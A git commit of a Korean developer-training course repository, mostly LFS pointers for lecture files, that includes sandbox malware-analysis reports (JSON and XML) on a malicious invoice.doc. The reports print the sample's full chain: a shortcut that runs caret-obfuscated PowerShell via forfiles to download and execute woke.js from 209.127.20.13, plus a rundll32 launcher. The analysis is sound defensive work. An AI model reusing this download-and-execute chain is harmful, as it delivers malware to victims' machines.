commit b8b35f9eba11aca13147bac8dc469fe9524dcacb Author: HappyTanuki Date: Mon Mar 23 19:54:23 2026 +0900 first commit diff --git a/.gitattributes b/.gitattributes new file mode 100644 index 0000000..be3f434 --- /dev/null +++ b/.gitattributes @@ -0,0 +1,5 @@ +*.pdf filter=lfs diff=lfs merge=lfs -text +*.png filter=lfs diff=lfs merge=lfs -text +*.jpg filter=lfs diff=lfs merge=lfs -text +*.pptx filter=lfs diff=lfs merge=lfs -text +*.zip filter=lfs diff=lfs merge=lfs -text \ No newline at end of file diff --git a/.lfsconfig b/.lfsconfig new file mode 100644 index 0000000..e69de29 diff --git a/Image_2026-03-13 09_45_15.png b/Image_2026-03-13 09_45_15.png new file mode 100644 index 0000000..f747eb1 --- /dev/null +++ b/Image_2026-03-13 09_45_15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:19fe111a57798c911d214bbc397a706dccbd18ea93e80b6e51e504d0ee88fc28 +size 33947 diff --git a/Image_2026-03-20 17_48_31.png b/Image_2026-03-20 17_48_31.png new file mode 100644 index 0000000..87c964f --- /dev/null +++ b/Image_2026-03-20 17_48_31.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfd556730825b6e53b648a37b0f5879afa826fe2db5bc14658a6b6059cb81f2a +size 13864 diff --git a/S-개발자 4기(상반기) 자리배치도(수정).pdf b/S-개발자 4기(상반기) 자리배치도(수정).pdf new file mode 100644 index 0000000..6e90216 --- /dev/null +++ b/S-개발자 4기(상반기) 자리배치도(수정).pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f37738ae3ba8eb42defb098c77e70d20e23e918c173dcb918c5da1f06fe67103 +size 2886523 diff --git a/Week1/Image_2026-03-11 17_14_16.png b/Week1/Image_2026-03-11 17_14_16.png new file mode 100644 index 0000000..6b7eb22 --- /dev/null +++ b/Week1/Image_2026-03-11 17_14_16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bfbc2005c26d03cd9a013ff8ccf556ba32a582e7db3679b1ff6b466dae352260 +size 229816 diff --git a/Week1/report.json b/Week1/report.json new file mode 100644 index 0000000..7cb6f8a --- /dev/null +++ b/Week1/report.json @@ -0,0 +1,178 @@ +{ + "Summary":{ + "Result":"Malicious", + "DetectName":"DOC\/DropFileExec.FW.1010", + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "Severity":10, + "SampleName":"invoice.doc", + "SampleExt":"DOC", + "TotalElapsedTime":2.817780, + "ReachedFileLoopLimit":false, + "ReachedUrlLoopLimit":false + }, + "FileTarget":{ + "invoice.doc_16880":{ + "TargetID":"invoice.doc_16880", + "ParentID":"", + "AbsolutePath":"d:\\Sample\\sample_for_QuadMiners\\invoice.doc", + "FileName":"invoice.doc", + "FileSize":16880, + "FileEXT":"DOC", + "MD5":"36B85687634E5B6E4E22CA582D0CC99D", + "SHA1":"1B51B1206F2C4B1030A7FCA525454FB4D5BC803E", + "SHA256":"invoice", + "HAS160":"D80336481A8DD017C0B966BC18E74609243A2F05", + "FileHeaderDump":"504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000" + }, + "skeml.lnk_258":{ + "TargetID":"skeml.lnk_258", + "ParentID":"invoice.doc_16880", + "AbsolutePath":"D:\/GIT\/tripitaka\/Build\/x64Debug\/tripitaka.exe.sandbox\/C\/Users\/Public\/skeml.lnk", + "FileName":"skeml.lnk", + "FileSize":258, + "FileEXT":"LNK", + "MD5":"1205E837D76605911605E2FB589CD98D", + "SHA1":"FF41313E2F2A860B0573F5EFA77B9962A88B3D82", + "SHA256":"A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D", + "HAS160":"086F7D4F4022A035D30A5DAFB1422C0C178C76BE", + "FileHeaderDump":"EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A" + } + }, + "Detection":{ + "Event":[ + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"FakeEXT-DOCX", + "AnalysisCode":"", + "Severity":3, + "Desc":"DOCX file has faked as `DOC` format.", + "DescInternational":{ + "ko-KR":"DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다." + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"GetObject", + "AnalysisCode":"BC", + "Severity":1, + "Desc":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL", + "DescInternational":{ + "ko-KR":"GetObject(\"NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8\"), RET: WSCRIPT.SHELL" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"CreateShortCut", + "AnalysisCode":"BC", + "Severity":2, + "Desc":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT", + "DescInternational":{ + "ko-KR":"ARF5XJ(WSCRIPT.SHELL).CreateShortCut(\"C:\\Users\\Public\\skeml.lnk\"), RET: SHORTCUT" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"Save", + "AnalysisCode":"BC", + "Severity":1, + "Desc":"RECO(SHORTCUT).Save()", + "DescInternational":{ + "ko-KR":"RECO(SHORTCUT).Save()" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"FileCreated", + "AnalysisCode":"FW", + "Severity":3, + "Desc":"New file (C:\\Users\\Public\\skeml.lnk) has been created.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n", + "DescInternational":{ + "ko-KR":"새로운 파일 (C:\\Users\\Public\\skeml.lnk)이 생성되었습니다.\r\n[DEFAULT]\r\nWindowStyle=7\r\nIconLocation=\r\nTargetPath=fOrfiLeS\r\nArguments=\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"\r\nWorkingDirectory=\r\n" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"FileExtracted", + "AnalysisCode":"FW", + "Severity":3, + "Desc":"C:\\Users\\Public\\skeml.lnk", + "DescInternational":{ + + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"Exec", + "AnalysisCode":"BC", + "Severity":3, + "Desc":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")", + "DescInternational":{ + "ko-KR":"ARF5XJ(WSCRIPT.SHELL).Exec(\"rundll32 url.dll,OpenURL C:\\Users\\Public\\skeml.lnk\")" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"DropFileExec", + "AnalysisCode":"FW", + "Severity":10, + "Desc":"This is an attack that dropped an hidden file and executes.", + "DescInternational":{ + "ko-KR":"감춰둔 파일을 생성해서 실행하는 공격입니다." + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"invoice.doc_16880", + "Name":"RunDll32", + "AnalysisCode":"FW", + "Severity":3, + "Desc":"Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source.", + "DescInternational":{ + "ko-KR":"url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다." + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"skeml.lnk_258", + "Name":"ForFiles", + "AnalysisCode":"FW", + "Severity":3, + "Desc":"Attempts to run with forfiles.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"", + "DescInternational":{ + "ko-KR":"forfiles로 특정 명령을 실행하려고 합니다.\r\n\/p c:\\windows\\system32 \/m notepad.exe \/c \"cmd \/c pow^ers^hell\/W 01 c^u^rl htt^p:\/\/209.127.20.13\/woke.j^s -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js\"" + } + }, + { + "EngineName":"profrog", + "EngineVersion":"1.5.0.305", + "TargetID":"skeml.lnk_258", + "Name":"PowerShell", + "AnalysisCode":"FW", + "Severity":8, + "Desc":"Attempts to perform malicious commands with PowerShell.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js", + "DescInternational":{ + "ko-KR":"PowerShell로 악의적인 명령을 수행하려고 합니다.\r\ncommand:PowerShell.exe \/W 01 curl http: \/\/209.127.20.13\/woke.js -o C:\\Users\\Public\\webnote.js;C:\\Users\\Public\\webnote.js" + } + } + ] + } +} \ No newline at end of file diff --git a/Week1/target.xml b/Week1/target.xml new file mode 100644 index 0000000..c94fb8a --- /dev/null +++ b/Week1/target.xml @@ -0,0 +1,194 @@ + + + + Malicious + DOC/DropFileExec.FW.1010 + profrog + 1.5.0.305 + 10 + invoice.doc + DOC + 2.817780 + false + false + + + + invoice.doc_16880 + + d:\Sample\sample_for_QuadMiners\invoice.doc + invoice.doc + 16880 + DOC + 36B85687634E5B6E4E22CA582D0CC99D + 1B51B1206F2C4B1030A7FCA525454FB4D5BC803E + invoice + D80336481A8DD017C0B966BC18E74609243A2F05 + 504B0304140006000800000021007C93BE7C8C010000B5050000130008025B436F6E74656E745F54797065735D2E786D6C20A2040228A000020000000000000000000000000000000000000000000000 + + + skeml.lnk_258 + invoice.doc_16880 + D:/GIT/tripitaka/Build/x64Debug/tripitaka.exe.sandbox/C/Users/Public/skeml.lnk + skeml.lnk + 258 + LNK + 1205E837D76605911605E2FB589CD98D + FF41313E2F2A860B0573F5EFA77B9962A88B3D82 + A07F1A5D03FC4E065DA890134F5794457BDEBF86DF834B21CFFCE63E43491D9D + 086F7D4F4022A035D30A5DAFB1422C0C178C76BE + EFBBBF5B44454641554C545D0D0A57696E646F775374796C653D370D0A49636F6E4C6F636174696F6E3D0D0A546172676574506174683D664F7266694C65530D0A417267756D656E74733D2F7020633A + + + + + profrog + 1.5.0.305 + invoice.doc_16880 + FakeEXT-DOCX + + 3 + DOCX file has faked as `DOC` format. + + DOCX 형식의 파일이 `DOC` 형식인 것처럼 위장했습니다. + + + + profrog + 1.5.0.305 + invoice.doc_16880 + GetObject + BC + 1 + GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL + + GetObject("NeW:72C24DD5-D70A-438B-8A42-98424B88AFB8"), RET: WSCRIPT.SHELL + + + + profrog + 1.5.0.305 + invoice.doc_16880 + CreateShortCut + BC + 2 + ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT + + ARF5XJ(WSCRIPT.SHELL).CreateShortCut("C:\Users\Public\skeml.lnk"), RET: SHORTCUT + + + + profrog + 1.5.0.305 + invoice.doc_16880 + Save + BC + 1 + RECO(SHORTCUT).Save() + + RECO(SHORTCUT).Save() + + + + profrog + 1.5.0.305 + invoice.doc_16880 + FileCreated + FW + 3 + New file (C:\Users\Public\skeml.lnk) has been created. +[DEFAULT] +WindowStyle=7 +IconLocation= +TargetPath=fOrfiLeS +Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" +WorkingDirectory= + + + 새로운 파일 (C:\Users\Public\skeml.lnk)이 생성되었습니다. +[DEFAULT] +WindowStyle=7 +IconLocation= +TargetPath=fOrfiLeS +Arguments=/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" +WorkingDirectory= + + + + + profrog + 1.5.0.305 + invoice.doc_16880 + FileExtracted + FW + 3 + C:\Users\Public\skeml.lnk + + + + + profrog + 1.5.0.305 + invoice.doc_16880 + Exec + BC + 3 + ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") + + ARF5XJ(WSCRIPT.SHELL).Exec("rundll32 url.dll,OpenURL C:\Users\Public\skeml.lnk") + + + + profrog + 1.5.0.305 + invoice.doc_16880 + DropFileExec + FW + 10 + This is an attack that dropped an hidden file and executes. + + 감춰둔 파일을 생성해서 실행하는 공격입니다. + + + + profrog + 1.5.0.305 + invoice.doc_16880 + RunDll32 + FW + 3 + Attempts to execute a OpenURL() of url.dll. It is used when performing malicious actions with a DLL received from an external source. + + url.dll의 OpenURL()를 실행하려고 합니다. 외부에서 받은 DLL로 악성행위를 수행할 때 사용됩니다. + + + + profrog + 1.5.0.305 + skeml.lnk_258 + ForFiles + FW + 3 + Attempts to run with forfiles. +/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" + + forfiles로 특정 명령을 실행하려고 합니다. +/p c:\windows\system32 /m notepad.exe /c "cmd /c pow^ers^hell/W 01 c^u^rl htt^p://209.127.20.13/woke.j^s -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js" + + + + profrog + 1.5.0.305 + skeml.lnk_258 + PowerShell + FW + 8 + Attempts to perform malicious commands with PowerShell. +command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js + + PowerShell로 악의적인 명령을 수행하려고 합니다. +command:PowerShell.exe /W 01 curl http: //209.127.20.13/woke.js -o C:\Users\Public\webnote.js;C:\Users\Public\webnote.js + + + + diff --git a/Week1/시스템 프로그래밍0 - 오리엔테이션.pdf b/Week1/시스템 프로그래밍0 - 오리엔테이션.pdf new file mode 100644 index 0000000..69bfdc3 --- /dev/null +++ b/Week1/시스템 프로그래밍0 - 오리엔테이션.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:535aef927522d7f69df491033ec78d42dcdbeb422bf4b1257976dd635c6bed40 +size 1784913 diff --git a/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기 - 실습.pdf new file mode 100644 index 0000000..af3f6f0 --- /dev/null +++ b/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7695765386e55fdfb23de193e60c60b667ee65b43e67df790c9a551ac172fff1 +size 195763 diff --git a/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기.pdf b/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기.pdf new file mode 100644 index 0000000..12cee5b --- /dev/null +++ b/Week1/시스템 프로그래밍1 - 변수형과 유니코드 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2e125fca26dbecc6294dc21c1d492d15360cdb7bc4c159a49b5afaa86e230d5 +size 1530587 diff --git a/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습 - (1).pdf b/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습 - (1).pdf new file mode 100644 index 0000000..5bfce16 --- /dev/null +++ b/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습 - (1).pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f38a14c81b3dda0bb230af966c7b7554d7c6c8595a2b0dadb4796698bbc7594f +size 327106 diff --git a/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습.pdf b/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습.pdf new file mode 100644 index 0000000..186d40c --- /dev/null +++ b/Week1/시스템 프로그래밍2 - 개발환경 구축하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb55172ece08a76c32f175c3931ab942325ca697abd90f7a53eb948efd28d519 +size 326286 diff --git a/Week1/시스템 프로그래밍2 - 개발환경 구축하기.pdf b/Week1/시스템 프로그래밍2 - 개발환경 구축하기.pdf new file mode 100644 index 0000000..a4ae7a7 --- /dev/null +++ b/Week1/시스템 프로그래밍2 - 개발환경 구축하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:effc22a9e8ce55bdd137e79c2b2d7a50af668a9d1f5d74e044ca8f173f608073 +size 2293159 diff --git a/Week1/시스템 프로그래밍3 - 문자열 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍3 - 문자열 정복하기 - 실습.pdf new file mode 100644 index 0000000..5d02dad --- /dev/null +++ b/Week1/시스템 프로그래밍3 - 문자열 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0611ea552348d9ba52e3e3343959b1777833d19a63a94c0a9847fb92115994e8 +size 243680 diff --git a/Week1/시스템 프로그래밍3 - 문자열 정복하기.pdf b/Week1/시스템 프로그래밍3 - 문자열 정복하기.pdf new file mode 100644 index 0000000..f883f73 --- /dev/null +++ b/Week1/시스템 프로그래밍3 - 문자열 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c200a0468dded64e11cc37ac8702f6aa00abb939fd9d7f3b952e6c11bc52a595 +size 1555993 diff --git a/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기 - 실습.pdf new file mode 100644 index 0000000..18a6dc5 --- /dev/null +++ b/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3fa4918854c7732f8d0de13f7b8980ad30b05d1600a54fe8b8be5af8a0653dfc +size 326327 diff --git a/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기.pdf b/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기.pdf new file mode 100644 index 0000000..89551ed --- /dev/null +++ b/Week1/시스템 프로그래밍4 - 컴파일러_링커_디버거 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ed81de4025953770881218251e63b95de057c0ffffe8ec5b60d23fe57131c68c +size 2348721 diff --git a/Week1/시스템 프로그래밍5 - 파일시스템 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍5 - 파일시스템 정복하기 - 실습.pdf new file mode 100644 index 0000000..c4206ba --- /dev/null +++ b/Week1/시스템 프로그래밍5 - 파일시스템 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ec57b45e618fb0f7394db67d72674fc79a882384848bd4b80152838b240a73b5 +size 203787 diff --git a/Week1/시스템 프로그래밍5 - 파일시스템 정복하기.pdf b/Week1/시스템 프로그래밍5 - 파일시스템 정복하기.pdf new file mode 100644 index 0000000..c413fa7 --- /dev/null +++ b/Week1/시스템 프로그래밍5 - 파일시스템 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9b958cb681ad83d0c585280447e919f81978e0d4761000940c1a6f577e3a4693 +size 3056352 diff --git a/Week1/시스템 프로그래밍6 - 데이터 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍6 - 데이터 정복하기 - 실습.pdf new file mode 100644 index 0000000..06cbc55 --- /dev/null +++ b/Week1/시스템 프로그래밍6 - 데이터 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4a40e3792c6065c4ecdff4c15795f56102f109825cbe67530c7e3e3bf1f22e98 +size 308915 diff --git a/Week1/시스템 프로그래밍6 - 데이터 정복하기.pdf b/Week1/시스템 프로그래밍6 - 데이터 정복하기.pdf new file mode 100644 index 0000000..902893d --- /dev/null +++ b/Week1/시스템 프로그래밍6 - 데이터 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c821683fbf1c7358bf347397890ebcd225c17a3a68471befd9a5d8a6d9885da2 +size 1743445 diff --git a/Week1/시스템 프로그래밍7 - 메모리 정복하기 - 실습.pdf b/Week1/시스템 프로그래밍7 - 메모리 정복하기 - 실습.pdf new file mode 100644 index 0000000..69c2d4f --- /dev/null +++ b/Week1/시스템 프로그래밍7 - 메모리 정복하기 - 실습.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:89cce18c2ce780479c687a31be2e5c3e87fce3c1c6778daae63958b2ec680c66 +size 360308 diff --git a/Week1/시스템 프로그래밍7 - 메모리 정복하기.pdf b/Week1/시스템 프로그래밍7 - 메모리 정복하기.pdf new file mode 100644 index 0000000..5cd9540 --- /dev/null +++ b/Week1/시스템 프로그래밍7 - 메모리 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d86328b176811062b23d61afbe9b5c55e251f180f83bfdf2a97b2dae8110bd4 +size 1901716 diff --git a/Week1/시스템 프로그래밍8 - 소켓 정복하기 - 실습.pptx b/Week1/시스템 프로그래밍8 - 소켓 정복하기 - 실습.pptx new file mode 100644 index 0000000..a3041c6 --- /dev/null +++ b/Week1/시스템 프로그래밍8 - 소켓 정복하기 - 실습.pptx @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94ce4bef8d450d818cbcd11ebefa0fdca4c1d3d2dd0f8586aecd831ae6667082 +size 650779 diff --git a/Week1/시스템 프로그래밍8 - 소켓 정복하기.pdf b/Week1/시스템 프로그래밍8 - 소켓 정복하기.pdf new file mode 100644 index 0000000..e0ba34e --- /dev/null +++ b/Week1/시스템 프로그래밍8 - 소켓 정복하기.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:814a102f0b5ee312b6887c0b317282c3e5234b869e48dce4731638a86c47f392 +size 1493526 diff --git a/Week2/Go 언어 & Gin 네트워크 프로그래밍.pdf b/Week2/Go 언어 & Gin 네트워크 프로그래밍.pdf new file mode 100644 index 0000000..c8bb3d8 --- /dev/null +++ b/Week2/Go 언어 & Gin 네트워크 프로그래밍.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e5679a2a62911524c13b33ca32be8b7ad1cae7d04aebaf8d006aea609373c2ad +size 1287240 diff --git a/Week2/go_course.zip b/Week2/go_course.zip new file mode 100644 index 0000000..9a78a86 --- /dev/null +++ b/Week2/go_course.zip @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:46a770b6790ad78e4b6c9426799bf0470772b256092bcfde3b9f64a7652a83fc +size 30005 diff --git a/Week2/수업자료.pdf b/Week2/수업자료.pdf new file mode 100644 index 0000000..2eaf827 --- /dev/null +++ b/Week2/수업자료.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d49920dbc92fc9e4a47ae3c1ed57c9604570238a887e0613ce126ec2fb77650c +size 4053581 diff --git a/Week2/웹 해킹 및 정보보안 실습 (1차).pdf b/Week2/웹 해킹 및 정보보안 실습 (1차).pdf new file mode 100644 index 0000000..852398e --- /dev/null +++ b/Week2/웹 해킹 및 정보보안 실습 (1차).pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2806939ae09f913868b238b663406ada2bed55d635023e247a4af159ff98955f +size 23359192 diff --git a/Week2/웹 해킹 및 정보보안 실습 (2차).pdf b/Week2/웹 해킹 및 정보보안 실습 (2차).pdf new file mode 100644 index 0000000..e16a8a3 --- /dev/null +++ b/Week2/웹 해킹 및 정보보안 실습 (2차).pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5900f3755491749b113551121a3c34c2e0dc6c9dd26a2248ea7a608382c50bc7 +size 17372810 diff --git a/Week2/웹 해킹 및 정보보안 실습(환경설정 및 이론).pdf b/Week2/웹 해킹 및 정보보안 실습(환경설정 및 이론).pdf new file mode 100644 index 0000000..a5d5baf --- /dev/null +++ b/Week2/웹 해킹 및 정보보안 실습(환경설정 및 이론).pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:528ed71bc34c3e18e609c7ddda9c56ee1dc204f4cf218ad84483e80b4e7ea578 +size 8313522 diff --git a/Week3/1일차_(6조)_이수진_김민수_NO메신저_통신규칙.pdf b/Week3/1일차_(6조)_이수진_김민수_NO메신저_통신규칙.pdf new file mode 100644 index 0000000..2744587 --- /dev/null +++ b/Week3/1일차_(6조)_이수진_김민수_NO메신저_통신규칙.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d02efa02c2e7fb90d74f0aed119135105a7d0f86c4b5ea34171d604ab5d08553 +size 1924371 diff --git a/Week3/20260323_135729.jpg b/Week3/20260323_135729.jpg new file mode 100644 index 0000000..5242d22 --- /dev/null +++ b/Week3/20260323_135729.jpg @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3998d61387bccd2d017c6b014881fa424cb563ccc4f887c2e2cc698923267392 +size 1856897 diff --git a/Week3/Day1_API_Design_v3.pdf b/Week3/Day1_API_Design_v3.pdf new file mode 100644 index 0000000..6a8a624 --- /dev/null +++ b/Week3/Day1_API_Design_v3.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9809b228437dc78c64de5e7c94c55f61bb282efb75075a216b2061625e0abd6c +size 495484 diff --git a/[S-개발자] 4기(상반기) 킥오프 OT 자료_공유.pdf b/[S-개발자] 4기(상반기) 킥오프 OT 자료_공유.pdf new file mode 100644 index 0000000..bb34b06 --- /dev/null +++ b/[S-개발자] 4기(상반기) 킥오프 OT 자료_공유.pdf @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a1eace9aa27174147b8c47021520a78921ec636e887c44cda287664cf53381d +size 11866055 diff --git a/다이얼 키 사용설명서.jpg b/다이얼 키 사용설명서.jpg new file mode 100644 index 0000000..6e234c4 --- /dev/null +++ b/다이얼 키 사용설명서.jpg @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:37329571fddf41fbf4482ecac68ff7be574eab41f9b4781e8eff29daed976854 +size 133493